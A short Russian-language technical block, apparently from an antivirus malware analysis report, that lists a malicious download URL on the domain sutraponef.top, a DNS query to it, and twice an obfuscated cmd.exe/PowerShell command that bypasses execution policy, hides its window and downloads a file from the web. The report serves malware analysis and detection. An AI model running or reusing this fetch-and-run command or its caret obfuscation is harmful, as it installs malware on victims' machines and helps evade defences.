Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OW^eR^ShE^Ll.^eXE^ -^ExeC^u^TI^O^N^P^o^LI^c^Y by^PA^s^s ^-NO^p^r^OFiLe ^-win^DO^WS^tyl^E ^H^I^d^D^e^n ^(NEW-obJecT^ sY^sTe^M^.n^E^t.w^eB^Cl^i^eNT).D^OwNlOAD^F^Il^e(^'http://s...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "p^OW^eR^ShE^Ll.^eXE^ -^ExeC^u^TI^O^N^P^o^LI^c^Y by^PA^s^s ^-NO^p^r^OFiLe ^-win^DO^WS^tyl^E ^H^I^d^D^e^n ^(NEW-obJecT^ sY^sTe^M^.n^E^t.w^eB^Cl^i^eNT).D^OwNlOAD^F^Il^e(^'http://s...' (со скрытым окном)